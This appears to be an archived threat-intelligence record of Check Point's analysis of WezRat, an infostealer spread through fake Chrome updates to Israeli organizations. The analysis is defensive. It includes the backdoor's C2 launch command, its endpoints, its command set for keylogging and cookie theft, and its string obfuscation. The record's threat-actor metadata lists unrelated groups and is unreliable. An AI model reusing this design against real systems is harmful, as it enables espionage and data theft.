{
	"id": "851289f7-b9b3-4a14-99ae-67cbacec75e0",
	"created_at": "2026-04-06T03:36:31.319641Z",
	"updated_at": "2026-04-10T13:12:47.186703Z",
	"deleted_at": null,
	"sha1_hash": "38686cc38695ac4bfcd79c2708c65c6eee2056d6",
	"title": "Malware Spotlight:  A Deep-Dive Analysis of WezRat",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 135038,
	"plain_text": "Malware Spotlight: A Deep-Dive Analysis of WezRat\r\nBy samanthar@checkpoint.com\r\nPublished: 2024-11-14 · Archived: 2026-04-06 03:31:35 UTC\r\nKey Findings:\r\nCheck Point Research (CPR) provides a comprehensive analysis of a custom modular infostealer, tracked as WezRat, after the FBI, the US Department of Treasury, and the Israeli National Cybersecurity Directorate (INCD) released a joint Cybersecurity Advisory and attributed the malware to the Iranian cyber group Emennet Pasargad. The group has been held responsible for several recent cyber operations in the US, France, Sweden, and Israel.\r\nThe latest version of WezRat was recently distributed to multiple Israeli organizations in a wave of emails impersonating the Israeli National Cyber Directorate (INCD). WezRat can execute commands, take screenshots, upload files, perform keylogging, and steal clipboard content and cookie files. Some functions are performed by separate modules retrieved from the command and control (C\u0026C) server in the form of DLL files, making the backdoor’s main component less suspicious.\r\nAnalysis of the malware versions led to the discovery of partial source code for the backend of WezRat. Further investigation of WezRat and its backend suggests that different individuals may be responsible for its development and operation.\r\nThe malware has been active for over a year; it has not yet been publicly analyzed or attributed to any group. During this time, WezRat gained additional modules, and its backend infrastructure has undergone various changes.\r\nIntroduction\r\nOn October 30th, the FBI, the US Department of Treasury, and the Israeli National Cybersecurity Directorate (INCD) released a joint Cybersecurity Advisory regarding recent activities of the Iranian cyber group Emennet Pasargad. 
The group recently operated under the name Aria Sepehr Ayandehsazan (ASA) and is affiliated with the Iranian Islamic Revolutionary Guard Corps (IRGC). The advisory details operations that have impacted various countries, including the US, France, Israel, and Sweden.\r\nThe following is a timeline of these activities:\r\nIn mid-2023, the group, operating under the Anzu Team persona, hacked a Swedish SMS service and distributed messages calling for revenge on those responsible for the Quran burnings that took place throughout the year.\r\nIn December 2023, the group, operating as For-Humanity, gained unauthorized access to a U.S.-based IPTV streaming company to broadcast tailored messages regarding the Israel-HAMAS conflict.\r\nIn mid-2024, the group launched a cyber-enabled disinformation campaign during the Summer Olympics. They hacked a French display provider to show images denouncing the participation of Israeli athletes. Additionally, they sent threats to Israeli athletes under the banner of the fake far-right group Regiment GUD, impersonating the actual French group GUD.\r\nThroughout 2023 and 2024, the group carried out multiple influence operations in Israel using various cover personas, including Cyber Flood, Contact-HSTG, and Cyber Court.\r\nThe advisory also attributed a few malware hashes to the group. Check Point Research tracks this malware family as WezRat. Recently, we identified the latest version of WezRat being distributed in a large-scale phishing campaign that impersonates the INCD and targets Israeli organizations.\r\nhttps://research.checkpoint.com/2024/wezrat-malware-deep-dive/\r\nPage 1 of 15\n\nThis publication provides a technical analysis of the campaign and the malware. 
WezRat was deployed for over a year, during which the malware’s architecture evolved significantly, impacting both the client and server sides.\r\nFake Google Chrome Update campaign\r\nOn October 21, 2024, multiple emails impersonating the Israeli National Cyber Directorate (INCD) were sent to various Israeli organizations. These emails were sent from the fraudulent address alert@il-cert[.]net and warned recipients of an urgent necessity to update their Chrome browser.\r\nFigure 1 – Phishing email sent to Israeli recipients.\r\nThe email included a link that appeared to direct users to the legitimate INCD site, il-cert.org.il, but in fact led to a lookalike domain, il-cert[.]net. From there, victims would automatically download a file named Google Chrome Installer.msi and then be redirected to the legitimate INCD website.\r\nThe downloaded MSI contains the legitimate Google Chrome installer and related files, but it also drops a backdoor named Updater.exe and executes it with two arguments:\r\n\"C:\\Program Files (x86)\\Google\\Update\\Updater.exe\" connect.il-cert.net 8765\r\nFor persistence, the MSI also adds a Run registry key called Chrome Updater, which executes the same command.\r\nFigure 2 – Infection chain delivering WezRat.\r\nThe payload in this campaign, Updater.exe, is the latest version of the group’s custom infostealer, WezRat.\r\nWezRat Analysis\r\nWezRat is written in C++. We observed two recently used samples of the backdoor. The primary difference between them is the use of common OLLVM obfuscation techniques such as opaque predicates and control flow flattening. The obfuscated variant also supports fewer commands. 
We provide an analysis of the latest non-obfuscated version with full command support (md5: 6b0d7b2e422a93e81ceed3645d36dd40, internally called bd.exe).\r\nFigure 3 – The difference between the two Updater.exe samples: OLLVM obfuscation (on the left) vs. its absence (on the right, sample with pdb path C:\\Users\\PC\\source\\repos\\bd\\Release\\bd.pdb).\r\nThe backdoor is executed with two parameters: connect.il-cert.net 8765, which represent the C\u0026C server and a number used as a “password” to enable the correct execution of the backdoor. After parsing the arguments, the backdoor calculates an offset pointing to a function responsible for handling the C\u0026C connection and parsing the commands. It then subtracts the expected number, 8765, from this offset and adds the argument provided as a “password.” If an incorrect number is supplied, the offset will not align with the intended function, causing the backdoor to execute an incorrect function or potentially crash.\r\nFigure 4 – Subtraction of the offset.\r\nOnce the C\u0026C connection logic function is executed, the backdoor loads the DLLs it needs, resolves imports used for system enumeration, networking, etc., and creates a mutex named {FA531CC1-0497-11D3-A180-00105A276C3E}.\r\nThis mutex has been featured in code examples on various coding forums for years, dating back to at least 2005. It has been used since earlier versions of WezRat. 
Reusing unchanged forum code for basic tasks, such as limiting the number of simultaneously running instances, could indicate a beginner developer, particularly in the initial stages of the malware’s development.\r\nCollecting initial data from the infected machine\r\nThe backdoor collects the following system information:\r\nUser profile path via environment variables – used later for saving the additional modules\r\nLocal machine IP\r\nComputer name\r\nUsername\r\nThe backdoor combines the IP, computer name, and username to calculate the bot ID using the FNV-1a (Fowler–Noll–Vo) hashing algorithm. It employs the 64-bit version of the algorithm but only uses the lower 32 bits. It then prepends eight zeroes to the FNV hash, resulting in a format like 00000000da635cc5, and stores it as md5. Although this value is not actually computed using the MD5 algorithm, earlier versions of WezRat (which will be discussed later) used the MD5 hash algorithm for the calculation of the bot ID. 
This may be a strategy to evade triggering certain defenses by omitting the more commonly recognized use of MD5, instead opting for FNV.\r\nBased on all the gathered information about the victim, the backdoor prepares the following JSON:\r\n{\"md5\":\"[bot ID]\",\"computerName\":\"[Machine name]\",\"userName\":\"[User name]\",\"ip\":\"[IP address]\",\"os\":\"Windows\"}\r\nNetwork Communication\r\nRegistering the bot with the C2 server\r\nThe initial network request to the C2 server contains the previously mentioned JSON with user information and is sent to the API endpoint /wez/Agent/InsMch. This endpoint, “Insert Machine,” registers the machine with the C2 server. Upon successfully processing the new bot, the server responds with the string true; however, the backdoor disregards this returned value from the server.\r\nSet up sleep intervals\r\nAfter registering the newly infected machine with the C2 server, the backdoor sends a request to the /sleep/[MD5] API endpoint. The response from the C2 server is then multiplied by 1000 and used as the number of seconds the backdoor sleeps between requests to the C2 server (60 seconds in the cases we observed).\r\nCommand retrieval loop\r\nTo retrieve commands from the C2 server, the malware sends a request to the /Read/[MD5] API endpoint using the POST method with the data q=[MD5]. 
The server can respond with an encrypted string representing the command: [Encrypted command name]\u003e[Command value]\u003c[Request ID].\r\nFor example, 101094087087098\u003e60\u003c26 represents ohaal\u003e60\u003c26.\r\nThe following JSON represents responses sent back (unencrypted) to the C2 server:\r\n{ \"id\":[Request ID],\"md5\" : \"[MD5]\",\"response\" : \"[Response based on the command]\"}\r\nWezRat supports the following commands:\r\nohaal updates the sleep timer. The backdoor checks the received value, and if it differs from the current sleep time, it sends back a response to the C2 server API endpoint /wez/Agent/UpSl, indicating the sleep timer has been updated. This command is also used as a keepalive / do-nothing command: the backdoor does nothing when the timer doesn’t require changing.\r\nchangedomain adds another C2 for the backdoor to communicate with in case the original one goes down. Despite the name, this won’t overwrite the current domain; it will only be added to the list and queried if requests to the previous C2 fail. The backdoor responds with an API request to the /wez/Agent/UpChd endpoint.\r\ncommand executes a command and sends the command response to the /wez/Agent/UpCmd API endpoint. If the command sent by the C2 is incorrect, the backdoor will respond with a string reminding the malware operators of the expected format: cmd.exe /c \u003cyour command\u003e. The operators can also send the mydir command (instead of a cmd command), which causes the backdoor to download and save mvpis.dll from the server. 
Then, the backdoor loads the DLL into the program, resolves the GetContent export, calls it, and returns the response to the server.\r\nupload downloads and saves JumpViewUi.dll from the server, loads it into the program, resolves the up export, and calls it using the following parameters: the C2 address, the arguments from the upload command, the upFile/ endpoint to send the reply to, and the request ID.\r\nscreenshot downloads and saves STITP.dll from the server, loads it into the program, and resolves the scj export. The resulting screenshot is saved to the Pictures/Screenshots folder under the current user and then uploaded to the server using JumpViewUi.dll.\r\nEKeyLogger downloads and saves TaskFlowUi.dll from the server, loads it into the program, resolves the threadKL export, and begins a new thread running the threadKL function. While the keylogger thread is running, any command other than EKeyLogger received from the C2 server will cause termination of the keylogger thread. Keystrokes are saved to the AppData\\Local\\Temp\\10105060.txt file, and once the thread is terminated, the file is sent to the /kylog/ API endpoint on the C2 server.\r\ndwnfile downloads a file from the C2 server: the file name is appended to the C2 URL, and the file is downloaded and saved to the appdata/local/temp folder.\r\ndwnclipboard downloads and saves clp.dll from the server, loads it into the program, and resolves two exports, GetClipboardText and FreeClipboardText. These two functions retrieve the clipboard data, which is then freed and sent to the C2 server.\r\nSndcoockie (note that the misspelling was made by the threat actors) downloads and saves JumpViewUi.dll from the server, loads it into the program, and resolves the up export. 
It grabs SQLite cookie files from major Chromium-based browsers and uploads them to the server using the resolved export.\r\nThe DLL modules mentioned above are analyzed in the following section.\r\nAfter executing each command received from the C2, the backdoor calls the /wez/Agent/InsMch API endpoint again as a keep-alive. It then receives another command from the /Read/ API endpoint and continues indefinitely. All network requests to the C2 server use the firefox user agent.\r\nString and Command Encryption\r\nThe backdoor uses a simple string encryption. Each character in the string is converted to its ASCII decimal value, reduced by 10, and then formatted as a three-digit number by adding leading zeros if needed.\r\nFor example, the encrypted representation of the string USERPROFILE is 075073059072070072069060063066059.\r\nThe decryption process is simple: split the string into three-digit segments, add 10 to each, and then convert each part to a character.\r\nWe’ve noticed that some strings in the C2 commands, such as command, are decremented by 14 instead of 10. This doesn’t affect the backdoor’s execution, as it compares received commands in encrypted form, but it suggests these are artifacts left from older versions.\r\nError handling / Debug strings\r\nThe backdoor’s exception handlers include random phrases that modify the result of the GetLastError function, allowing it to return a string or parts of it. We found no practical use for those modifications, as the errors are not reported back to the server. 
They could simply be leftover debug information or a means for operatives to identify errors while testing and using the backdoor, without disclosing its malicious intent.\r\nFigure 5 – Exception handlers using the error handling strings.\r\nDLL modules\r\nAs detailed before, to execute specific C2 commands, additional DLLs must be downloaded from the C2 server. These DLLs are stored in the appdata/local/temp directory, loaded into the program, and then a specific export is executed. In total, five DLLs are used in the WezRat sample deployed in the campaign impersonating the INCD. We could not obtain these modules from the C2 server during our analysis, as it was only active for a brief period. However, by tracking potential infrastructure used by the threat actors, we identified a new C2 server set up by the actor in early November, and we successfully retrieved the modules.\r\nWhile the URLs and functionality of these DLLs mostly aligned with our expectations, the DLL and export names differed in some cases. The actors likely not only improved the modules’ code over time but also varied the export names to give each DLL unique characteristics. Additionally, some DLLs include obfuscation and use the same string obfuscation techniques as the main backdoor.\r\nAlthough we could not retrieve a payload from the Download/3 endpoint, which was expected to provide the DLL handling the mydir command, the server did contain an additional DLL at the Download/6 endpoint, named persist.dll. 
This DLL handles persistence but was not referenced in the sample we analyzed, as persistence was managed by its MSI installer.\r\nBelow is a summary comparing the expected modules with those retrieved from the actor-controlled server:\r\nEndpoint | Module functionality | Module/export name (from the sample) | DLL/export name (from another C2 server) | OLLVM obfuscation | String obfuscation | Compilation timestamp (UTC)\r\nDownload/0 | Take screenshot | SPITP.dll (scj) | scDll.dll (scsh) | | | Oct 21, 2024, 12:26:16\r\nDownload/1 | Keylogger | TaskFlowUi.dll (threadKL) | klDll.dll (threadKL) | V | V | Oct 27, 2024, 07:39:14\r\nDownload/2 | Upload file to the server | JumpViewUi.dll (up) | upDll.dll (up) | V | V | Oct 27, 2024, 07:41:59\r\nDownload/3 | Perform mydir command | mvpis.dll (GetContent) | – | – | – | –\r\nDownload/4 | Get clipboard data | clp.dll (GetClipboardText, FreeClipboardText) | clbDll.dll (GetClipboardText, FreeClipboardText) | | | Oct 16, 2024, 06:18:18\r\nDownload/6 | Set up persistence | – | persist.dll (MainFunc) | | | Nov 04, 2024, 07:43:51\r\nScreenshot module – scDll.dll\r\nThe arguments in this DLL are slightly different from what we expected from the WezRat code. In this version, the DLL accepts two arguments: result and target directory. 
When the DLL is loaded and the scsh export is called, it resolves APIs commonly used for taking screenshots:\r\nFigure 6 – Windows API used in the screenshot capture module.\r\nThe resulting BMP image name is generated using random numbers:\r\nFigure 7 – Generation of the image name using calls to random and some manipulations on the generated numbers.\r\nThe module combines the target directory provided as an argument with the generated bmp name, saves the screenshot to the resulting path, copies the result image path to the first argument, and returns it to the main backdoor.\r\nKeylogger – klDll.dll\r\nThe keylogger DLL starts from the threadKL export and uses the Windows APIs that are commonly used to capture keystrokes, such as SetWindowsHookExA, CallNextHookEx, GetKeyState, and GetAsyncKeyState.\r\nThen, it starts a thread that goes over the results of the key state functions and writes them to the file AppData\\Local\\Temp\\10105060.txt.\r\nFigure 8 – Part of the keylogger code.\r\nFile upload – upDLL.dll\r\nThe primary purpose of the DLL is to upload files to the C2 server. It is called via the up export, with four arguments: the C2 server address, the path on the C2 server, the path to the file to exfiltrate, and the upload name.\r\nThe file is sent to the C2 server in a POST request using the User-Agent edge:\r\nGet clipboard data – clbDLL.dll\r\nThis module also uses common Windows APIs to get clipboard data:\r\nFigure 9 – Windows API used by the clipboard module.\r\nThe GetClipboardText export resolves the aforementioned DLLs and exports. 
It then calls OpenClipboard to open the clipboard and gain access to its contents, uses GetClipboardData to retrieve a handle to the data, uses this handle (with GlobalLock to lock the data into memory) to read the clipboard contents into a buffer, and returns them to the caller.\r\nThe FreeClipboardText export is then used to free a buffer received as an argument.\r\nPersistence module – persist.dll\r\nThe sole purpose of this DLL is to establish persistence by adding a registry key under Software\\Microsoft\\Windows\\CurrentVersion\\Run.\r\nThe DLL has a single export named MainFunc, which requires two arguments: the path to the program to run and the arguments to run it with. The provided values are then used as the values for a newly created registry key called Updater.\r\nThreat actors likely use this DLL to enable WezRat persistence, particularly in infection chains that haven’t yet established persistence, as WezRat itself lacks built-in persistence mechanisms.\r\nOlder versions and WezRat evolution\r\nThe earliest sample of WezRat we identified was compiled on August 30, 2023, and uploaded to VirusTotal on September 1, 2023. It was aptly named first.exe.\r\nThe earlier versions of WezRat had hardcoded C2 server addresses and didn’t rely on a “password” argument to run. String encryption uses the same algorithm in all the versions.\r\nData collected on the infected machine by first.exe is similar and contains the computer name, username, and local IPv4. In this version, the data is combined, and the md5 field (bot ID) is calculated using actual MD5 and not FNV. In terms of its API, it functions similarly to the latest version. A newly infected machine is registered with the C2 using the /wez/insert endpoint. 
For command execution, the system uses the /api/ endpoint to receive commands, the /api2/ endpoint to retrieve data for command execution, and then again to send the results of the executed command.\r\nThroughout the various samples, the available commands are:\r\nCommand Name | Command Action\r\nsleep | Update the sleep time between requests\r\ncommand | Execute a command and return the results\r\ndirr | List a directory and return the results\r\ndownload | Upload a file to the C2\r\nuploading | Download a file from the C2\r\nlibrary | Receive a DLL from the C2 server to load directly into memory\r\nexecute | Execute a process\r\nchangedomain | Add another C2 address to attempt to communicate with\r\nWezRat capabilities evolution\r\nIn addition to first.exe, we found more samples from various dates, active from the end of 2023 to the beginning of 2024. Judging by the remaining artifacts, they were used in different infection chains. For example, afwpmz.exe and users.dll have close compilation dates, the same functionality, and even the same C2 server. However, users.dll is compiled as a DLL (pdb path: E:\\w2\\Back - Copy (2)\\x64\\Release\\Dll1.pdb), and afwpmz.exe seems to run persistently from the Startup folder.\r\nThe commands shared among all samples are sleep/ohaal, command, and changedomain; the presence of others varies depending on the sample and the context in which they were used. 
The “password” for running the sample correctly was first added in the One_Drive.exe sample, created at the end of January 2024.\r\nSummary of the supported commands across various samples of WezRat, along with their compilation dates:\r\nCommand | first.exe (2023-08-30) | afwpmz.exe (2023-11-23) | users.dll (2023-11-25) | One_Drive.exe (2024-01-28) | Updater.exe / bd.exe (2024-10-15) | Updater.exe with ollvm (2024-10-17)\r\nsleep V V V V V V\r\ncommand V V V V V V\r\ndirr V V V V\r\ndownload V V\r\nuploading V V V\r\nlibrary V\r\nexecute V\r\nchangedomain V V V V V V\r\nscreenshot V V\r\nkeylogger V V\r\ndwnclipboard V\r\nsndcookie V\r\nWezRat initially functioned more as a simple Remote Access Trojan with basic commands. Over time, additional features such as screenshot capabilities and a keylogger were incorporated and handled as separate commands. We believe that these features rely on the code of DLLs already used by the threat actors, possibly accessed through the library command.\r\nSocket-based Samples\r\nIn May 2024, another set of samples was uploaded to VirusTotal. These samples feature the same string obfuscation and similar error handling with random phrases, but they are significantly different from WezRat. 
Those samples have the pdb path C:\\Users\\Administrator\\Desktop\\Socket-Client\\Socket-Client\\x64\\Release\\Socket-Client.pdb and use raw socket communication instead of HTTP/S.\r\nThe samples lack features like mutex creation or user profiling, which are present in WezRat, and have only one capability: command execution, acting like a reverse shell. Socket-based samples require three arguments: C2 address, port, and “password,” working similarly to WezRat, with the correct offset of the primary logic function depending on the correct password.\r\nUpon connecting to the C2 server, the malware sends it the string Init\u003csep\u003eWindows and expects any response other than No. The server can then respond with the string [command id]\u003csep\u003e[command to execute]. Similarly to WezRat, if the operator forgets how to run commands, the sample responds with the string cmd.exe /c \u003cyour command\u003e.\r\nFigure 10 – Command execution by the socket-based sample.\r\nThe reason for the sudden shift to such a simple tool is unclear to us. 
As we have never observed these samples used in the wild, we can only speculate whether these are tests of a new approach or attempts to overcome detections in specific environments.\r\nA sneak peek into the C2\r\nFigure 11 – Opendir on a WezRat C2 server.\r\nIn late 2023, one of the WezRat C2 servers, 46.249.58[.]136, contained an opendir that provided visibility into the inner workings and source code of WezRat’s backend and its panel UI for operators:\r\nFigure 12 – Contents of /commandPage.html showing the operator’s UI for old versions of WezRat.\r\nFigure 13 – A simple UI to run a command for a specific machine.\r\nThe backend code used to be written in JavaScript, specifically for Node.js, and all data is stored and manipulated in a MySQL database:\r\nFigure 14 – Part of the initialization code on the C2 server.\r\nFigure 15 – Part of the C2 backend code.\r\nIt’s likely that after the source code was “leaked,” the threat actors needed to rewrite it. Over time, we observe changes in API endpoints. Based on the characteristics of C2 servers in the newer versions, the backend of WezRat moved to Kestrel around March 2024.\r\nDue to the specific error handling in the backdoor code, the hints on how to run commands correctly, and the overall UI of the panel, we suspect there are at least two teams behind this campaign: one in charge of development and the other in charge of operating the backdoor.\r\nConclusion\r\nIn this article, we analyzed the modules and the evolution of the WezRat backdoor, which has been used by Emennet Pasargad for over a year, as reported by the IC3 advisory. Recent versions of WezRat feature a stealthier operation mode, achieved by dividing the backdoor into separate module DLLs. 
Additionally, the backdoor has gained more infostealer functions.\r\nThe ongoing development and refinement of WezRat indicate a dedicated investment in maintaining a versatile and evasive tool for cyber espionage. Emennet Pasargad’s activities target various entities across the United States, Europe, and the Middle East, posing a threat not only to direct political adversaries but also to any group or individual with influence over Iran’s international or domestic narrative.\r\nProtections\r\nCheck Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file types, and operating systems and protect against the type of attacks and threats described in this report.\r\nHarmony Endpoint\r\nBehavioral.Win.FakeChrome.B\r\nThreat Emulation\r\nTrojan.Wins.FakeUpdater.A\r\nIOCs\r\nThe SHA256 hashes and server indicators are listed in the source report.\r\nSource: https://research.checkpoint.com/2024/wezrat-malware-deep-dive/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2024/wezrat-malware-deep-dive/"
	],
	"report_names": [
		"wezrat-malware-deep-dive"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "07131850-5161-48b8-98be-6b0271d44d0e",
			"created_at": "2024-01-23T13:22:35.085803Z",
			"updated_at": "2026-04-10T02:00:03.521854Z",
			"deleted_at": null,
			"main_name": "Cotton Sandstorm",
			"aliases": [
				"Emennet Pasargad",
				"Holy Souls",
				"MARNANBRIDGE",
				"NEPTUNIUM",
				"HAYWIRE KITTEN"
			],
			"source_name": "MISPGALAXY:Cotton Sandstorm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775446591,
	"ts_updated_at": 1775826767,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/38686cc38695ac4bfcd79c2708c65c6eee2056d6.pdf",
		"text": "https://archive.orkl.eu/38686cc38695ac4bfcd79c2708c65c6eee2056d6.txt",
		"img": "https://archive.orkl.eu/38686cc38695ac4bfcd79c2708c65c6eee2056d6.jpg"
	}
}